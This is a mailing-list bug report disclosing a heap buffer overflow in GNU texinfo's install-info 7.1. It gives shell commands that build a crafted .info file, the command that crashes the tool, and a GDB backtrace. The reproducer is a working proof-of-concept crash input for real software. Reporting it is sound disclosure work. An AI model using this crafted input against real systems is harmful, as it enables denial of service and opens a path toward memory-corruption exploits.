LogicLuminary Sun, 19 Apr 2026 15:13:00 -0700

 Dear Texinfo Maintainers,

I hope you are doing well. I have discovered a heap buffer overflow in the
install-info utility (GNU texinfo 7.1, 2023).


*Tested Environment:*

   -

   *Version:* install-info (GNU texinfo) 7.1
   -

   *OS:* Ubuntu 24.04.3 LTS

*Steps to Reproduce: *

1)  Create a malicious .info file with excessive line-break expansion:

echo "START-INFO-DIR-ENTRY" > overflow.info
echo -n "* Crash: (crash). " >> overflow.info
for i in {1..100}; do echo "A." >> overflow.info; done
echo "END-INFO-DIR-ENTRY" >> overflow.info

2)  Run: install-info overflow.info normal.dir

*Observed Result:* The program crashes with malloc(): corrupted top size
and a SIGABRT.

*GDB Backtrace (Summary):*

malloc(): corrupted top size

Program received signal SIGABRT, Aborted.
Download failed: Invalid argument.  Continuing without source file
./nptl/./nptl/pthread_kill.c.
__pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized out>)
at ./nptl/pthread_kill.c:44
warning: 44     ./nptl/pthread_kill.c: No such file or directory
(gdb) bt
#0  __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized
out>) at ./nptl/pthread_kill.c:44
#1  __pthread_kill_internal (signo=6, threadid=<optimized out>) at
./nptl/pthread_kill.c:78
#2  __GI___pthread_kill (threadid=<optimized out>, signo=signo@entry=6) at
./nptl/pthread_kill.c:89
#3  0x00007ffff7c4527e in __GI_raise (sig=sig@entry=6) at
../sysdeps/posix/raise.c:26
#4  0x00007ffff7c288ff in __GI_abort () at ./stdlib/abort.c:79
#5  0x00007ffff7c297b6 in __libc_message_impl (fmt=fmt@entry=0x7ffff7dce8d7
"%s\n")
    at ../sysdeps/posix/libc_fatal.c:134
#6  0x00007ffff7ca8ff5 in malloc_printerr (str=str@entry=0x7ffff7dcc6f7
"malloc(): corrupted top size")
    at ./malloc/malloc.c:5775
#7  0x00007ffff7cac2fc in _int_malloc (av=av@entry=0x7ffff7e03ac0
<main_arena>, bytes=bytes@entry=1659)
    at ./malloc/malloc.c:4447
#8  0x00007ffff7cad812 in __GI___libc_malloc (bytes=bytes@entry=1659) at
./malloc/malloc.c:3328
#9  0x0000555555559438 in xmalloc (s=1659) at ../gnulib/lib/xmalloc.c:43
#10 format_entry (outstr_len=0x5555555721a0, outstr_out=0x555555572198,
width=<optimized out>, align=35, calign=33,
    desc_len=399,
    desc=0x555555572340 "A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.
A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.
A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.  A.
 "...,
    name_len=17, name=0x555555572320 "* Crash: (crash).")
    at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1446
#11 reformat_new_entries (maxwidth_cli=<optimized out>,
align_cli=<optimized out>, calign_cli=<optimized out>,
    entries=<optimized out>) at
/usr/src/texinfo-7.1-3build2/install-info/install-info.c:1716
#12 main (argc=<optimized out>, argv=<optimized out>) at
/usr/src/texinfo-7.1-3build2/install-info/install-info.c:2451
(gdb)

I would appreciate it if you could confirm this finding.

Best regards,
Leenear

Reply via email to